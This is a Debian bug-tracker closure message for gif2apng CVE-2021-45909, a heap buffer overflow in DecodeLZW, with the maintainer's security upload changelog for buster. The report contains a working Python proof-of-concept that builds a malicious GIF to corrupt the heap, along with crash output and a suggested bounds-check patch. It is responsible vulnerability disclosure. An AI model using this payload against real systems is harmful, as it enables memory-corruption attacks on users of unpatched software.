Your message dated Sat, 13 Aug 2022 17:02:32 +0000 with message-id <[email protected]> and subject line Bug#1002668: fixed in gif2apng 1.9+srconly-2+deb10u1 has caused the Debian Bug report #1002668, regarding gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [email protected] immediately.) -- 1002668: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002668 Debian Bug Tracking System Contact [email protected] with problems
--- Begin Message ---Package: gif2apng Version: 1.9+srconly-3 Severity: important Tags: security Dear Maintainer, There is a heap based buffer overflow in the gif2apng package. The vulnerability is located in the DecodeLZW function in the gif2apng.cpp file. The problem here is, that this function writes to a buffer, that was allocated using malloc without checking the size of this buffer. Therefore it is possible to provide a gif to the program, that contains more data than fits into this buffer leading to a memory corruption on the heap. I wrote the following poc script in python: #!/bin/python3 # Writing to poc.gif f = open("poc.gif", "wb") # Data needed to enter the code path: beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" * 9 f.write(beginning) # Value needed in the vulnerable function mincode = b"\x07" f.write(mincode) for i in range(0,10000): # Size value and byte we write to the heap target_char = b"\x01" + b"A" f.write(target_char) # Resetting the values using "clearcode" to keep the code path as simple as possible clear_code = b"\x01" + b"\x80" f.write(clear_code) f.close() This script creates a file called poc.gif, which writes 10000 "A"'s into a buffer of size 512 leading to memory corruption on the heap. I tested this on Debian 10 using the current version of the package from the testing repository and got the following output: $ gif2apng -i0 poc.gif /dev/null gif2apng 1.9 using ZLIB Reading 'poc.gif'... 1 frames. malloc(): corrupted top size Abgebrochen This vulnerability seems to allow a write of an arbitrary number of arbitrary bytes. Therefore I think it likely, that this could be exploited. To fix this issue locally I added a buffer_size variable to the main function, which holds the size of the allocated buffer (the imagesize value used initially for the allocation was overwritten at some point). I then passed this value to the DecodeLZW function and added two if-statements around the writes to the the buffer to check whether the buffer can hold more bytes. My code looks as follows: void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added parameter img_size { unsigned int bytes_written = 0; [...] if (lastcode == -1) { if (bytes_written < img_size) { // Added if-statement *pout++ = suffix[code]; bytes_written++; } else { printf("Invalid image size\n"); exit(0); } firstchar = lastcode = code; continue; } [...] do { if (bytes_written < img_size) { // Added if-statement *pout++ = *--pstr; bytes_written++; } else { printf("Invalid image size\n"); exit(0); } } while (pstr > str); [...] int main(int argc, char** argv) { unsigned int buffer_size = 0; // New variable to hold the size of the buffer [...] grayscale = 1; buffer_size = imagesize*2; // New variable, as imagesize is overwritten at some point buffer = (unsigned char *)malloc(buffer_size); if (buffer == NULL) { printf("Error: not enough memory\n"); return 1; } [...] DecodeLZW(buffer, buffer_size, f1); // Added buffer_size [...] DecodeLZW(buffer, buffer_size, f1); // Added Buffer size [...] This compiled successfully and fixed the buffer overflow for me. I am however not sure if this is the cleanest way to fix the issue and it could use some more testing. Best regards Kolja -- System Information: Debian Release: 10.11 APT prefers oldstable-updates APT policy: (500, 'oldstable-updates'), (500, 'oldstable') Architecture: amd64 (x86_64) Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores) Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages gif2apng depends on: ii libc6 2.28-10 ii libzopfli1 1.0.2-1 ii zlib1g 1:1.2.11.dfsg-1 gif2apng recommends no packages. Versions of packages gif2apng suggests: pn apng2gif <none> -- no debconf information
--- End Message ---
--- Begin Message ---Source: gif2apng Source-Version: 1.9+srconly-2+deb10u1 Done: Håvard F. Aasen <[email protected]> We believe that the bug you reported is fixed in the latest version of gif2apng, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [email protected], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Håvard F. Aasen <[email protected]> (supplier of updated gif2apng package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [email protected]) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Thu, 28 Jul 2022 23:56:21 +0200 Source: gif2apng Architecture: source Version: 1.9+srconly-2+deb10u1 Distribution: buster Urgency: medium Maintainer: Khalid El Fathi <[email protected]> Changed-By: Håvard F. Aasen <[email protected]> Closes: 1002667 1002668 1002687 Changes: gif2apng (1.9+srconly-2+deb10u1) buster; urgency=medium . * Non-maintainer upload. * CVE-2021-45909, Closes: #1002668: heap based buffer overflow in the DecodeLZW * CVE-2021-45910, Closes: #1002667: heap-based buffer overflow within the main function * CVE-2021-45911, Closes: #1002687: heap based buffer overflow in processing of delays in the main function Checksums-Sha1: 77391152adfba90edcfa8e747769bcf09a62b876 2009 gif2apng_1.9+srconly-2+deb10u1.dsc f184e5ccbdbc49945f5af571fc2b3b00b74a316b 8916 gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz b100032d2b6efbc6fbde9adcc696b1e5bc9fa5f1 5441 gif2apng_1.9+srconly-2+deb10u1_source.buildinfo Checksums-Sha256: ba13882e087d8f431366087ad820d514f51c5124d45195bdc7e247c857232482 2009 gif2apng_1.9+srconly-2+deb10u1.dsc 88ef009c786000079146033f91d3b6c1c3bf0d46b0674b97b076abe6ccf2f4f1 8916 gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz 8afc7fb97cab9db5e611ecbff73f5ae57a9000cfbe7f69d73b4d5f39d6c5a86f 5441 gif2apng_1.9+srconly-2+deb10u1_source.buildinfo Files: 39effd0d93ec256fc220da6a17a78892 2009 graphics optional gif2apng_1.9+srconly-2+deb10u1.dsc d281aa7b5ed1745ad760c17582cc8c07 8916 graphics optional gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz 7442a9a2d9a4874284a6d246af137e9f 5441 graphics optional gif2apng_1.9+srconly-2+deb10u1_source.buildinfo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEkjZVexcMh/iCHArDweDZLphvfH4FAmLvt8QACgkQweDZLphv fH6J/hAAsAD+SGWK4pyP83w5+tB3bhJcoHE84b91rx7nvkimmMzXMj9XHpqcekzP 8tmSS1Z0Awh8lhoWeXXc6hHpcepbUyH8vibj0x3YYbaN6Bu+E+kTqK+CnzqNEDwA 3LdHWihHxM2redtyYNWkZ+pHwiuIf8/z+0ZlST8DrRtirQoTaN89i1t3AdmsnzBd gfripsizb/DJCqf3UN+5HVPo3duZehc7jwLoc6lBcIUknZAhTohouaiCgUjFaJ5I w7ITy3vpCk1/gX4ONr8+uKQwf1m/8kGz6311nPlT3/yTPXwarlmrlH7oeDYn0hgp P8j8PNx1KbgmawB0Bu1UXSj+zGZ3VJdQ4IvrXw7ABPVs1dKGJxVFZP0/CMNdKxI0 d8ztDzRU3iOSJauBddNmFK8iWz3sorP8xQNMfzJQfjzRct8sfKzQMSZDpOrn+z1g aSYaiVnjSiA2FXhzHDtfdZCxNr41Fz5YeNl24Ab9A5FUqoefRBibCI8CCOB82Rxm 7sSA0n/Y573rDwkuCB919RNx0MJXQZ1MmMHZ9vkycarEDm7Ed6mXPn7931CYEBCz hQGaG2AfX3+AI3yocgADJwbn9OzfeRIZnV8voGZmgCLoQK5bxJZklODdEuc2U+yp a0erC8CgV/4mC3zTgQTsEB8A2m2eAjjUZmJoIOZmSJp4CGetI/E= =7TL4 -----END PGP SIGNATURE-----
--- End Message ---
